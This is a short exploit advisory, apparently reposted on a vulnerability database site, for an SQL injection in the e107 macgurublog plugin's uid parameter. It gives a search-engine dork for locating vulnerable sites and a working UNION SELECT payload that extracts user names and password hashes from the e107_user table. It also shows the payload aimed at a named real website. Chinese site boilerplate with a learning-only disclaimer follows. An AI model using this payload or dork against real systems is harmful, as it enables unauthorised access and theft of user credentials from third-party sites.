e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj author: ZoRLu home: z0rlu.blogspot.com concat: trt-turk@hotmail.com date: 28/10/2008 n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( n0te: a.q kpss : ) ) dork: allinurl:"macgurublog.php?uid=" exploit: http://localhost/script_path/macgurublog.php?uid=[SQL] [SQL]= -1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/* example: http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/* thanks: str0ke
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论